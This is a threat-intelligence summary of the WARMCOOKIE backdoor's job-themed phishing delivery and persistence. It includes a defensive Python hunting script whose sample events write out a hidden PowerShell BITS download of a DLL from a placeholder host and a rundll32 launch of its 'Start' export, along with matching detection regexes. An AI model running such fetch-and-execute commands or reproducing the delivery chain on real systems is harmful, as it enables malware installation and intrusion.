2024-06-20

WARMCOOKIE Malware Lands on Windows Systems Through Job-Themed Phishing Emails

Level: Tactical | Source: Elastic


Windows malware known as 'Warmcookie' is being distributed through phishing emails disguised as job opportunities and recruitment offers. Researchers at Elastic Security Labs have reported on the malware, observing its distribution since late April. They assess it as an initial backdoor used to gain a foothold in networks and deploy secondary payloads, with capabilities to fingerprint the infected machine, take screenshots, execute commands, and covertly communicate with the attacker's infrastructure. Each WARMCOOKIE sample is configured with a specific command and control (C2) IP address and an RC4 key, indicating that each victim receives an individually built payload. The targeted nature of the campaign is evident in the phishing emails, as Elastic reports: "These emails targeted individuals by their names and their current employer, enticing victims to pursue new job opportunities by clicking a link to an internal system to view a job description."

Victims who fall for the ruse set off an attack sequence that begins with downloading a JavaScript (.js) file from a phishing site. This file launches a PowerShell script that uses the Background Intelligent Transfer Service (BITS) to fetch the WARMCOOKIE DLL and execute it via its 'Start' export. Once running, WARMCOOKIE establishes persistence by creating a scheduled task that launches the DLL through rundll32, so the backdoor survives reboots. The task is "scheduled to run every 10 minutes every day," giving the malware long-term, covert access to the compromised system.
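The delivery chain above leaves three observable process-creation artifacts: PowerShell pulling a DLL over BITS, rundll32 invoking a DLL's 'Start' export from a user-writable path, and rundll32 being launched by the Task Scheduler. The following is an added detection example written for this summary, not code from Elastic or Anvilogic; the events, paths and URL are constructed placeholders, and treating svchost.exe as the parent of scheduled-task actions is an approximation (the Schedule service is hosted in svchost.exe, but so are many other services).

```python
import re

# Constructed sample process-creation events (not real telemetry). Field names
# mirror typical EDR/Sysmon fields; the URL and file paths are placeholders.
SAMPLE_EVENTS = [
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c Start-BitsTransfer -Source "
                "http://PLACEHOLDER.invalid/p -Destination C:\\Users\\Public\\x.dll"},
    {"parent": "svchost.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\Public\\x.dll,Start"},
    {"parent": "explorer.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},   # benign control
]

# Paths an unprivileged user can write to; DLLs loaded from here deserve scrutiny.
USER_WRITABLE = re.compile(r"(?i)\\(users|programdata|temp)\\")
# PowerShell BITS download whose destination is a DLL.
BITS_DLL = re.compile(r"(?i)(start-bitstransfer|bitsadmin)\b.*\.dll\b")
# rundll32 calling a DLL's exported function named Start.
RUNDLL_START = re.compile(r"(?i)\.dll\s*,\s*start\b")


def classify(event):
    """Return the names of the hunting rules this event trips ([] if none)."""
    img, cmd, parent = (event[k].lower() for k in ("image", "cmdline", "parent"))
    hits = []
    if img.endswith("powershell.exe") and BITS_DLL.search(cmd):
        hits.append("bits_dll_download_via_powershell")
    if img.endswith("rundll32.exe") and RUNDLL_START.search(cmd) \
            and USER_WRITABLE.search(cmd):
        hits.append("rundll32_start_export_user_path")
    # Approximation: task actions are spawned by the Schedule service, which
    # runs inside svchost.exe, so svchost -> rundll32 is a coarse proxy for a
    # scheduled task; confirm against the task definition before acting on it.
    if img.endswith("rundll32.exe") and parent.endswith("svchost.exe") \
            and USER_WRITABLE.search(cmd):
        hits.append("rundll32_from_scheduled_task")
    return hits


def hunt(events):
    """Return (index, rule_names) for every event that trips at least one rule."""
    findings = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", rules)
```

Running the hunt over the constructed events flags the BITS download and the rundll32 launch while leaving the benign Control Panel invocation alone; in a real deployment the same rules would run over process-creation logs from the endpoint telemetry source.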

WARMCOOKIE's operational framework relies on dynamic API loading and custom obfuscation techniques to evade detection. The malware communicates with its command and control (C2) server over encrypted channels. Its capabilities include executing commands directly on the infected host with cmd /c, querying system information (IP address, CPU details, and installed programs from the registry), and capturing sensitive data, all of which is sent back to the C2 infrastructure. Elastic Security Labs evaluates the malware as a rising threat, stating that it poses a "formidable threat that provides the capability to access target environments and push additional types of malware down to victims. While there is room for improvement on the malware development side, we believe these minor issues will be addressed over time."
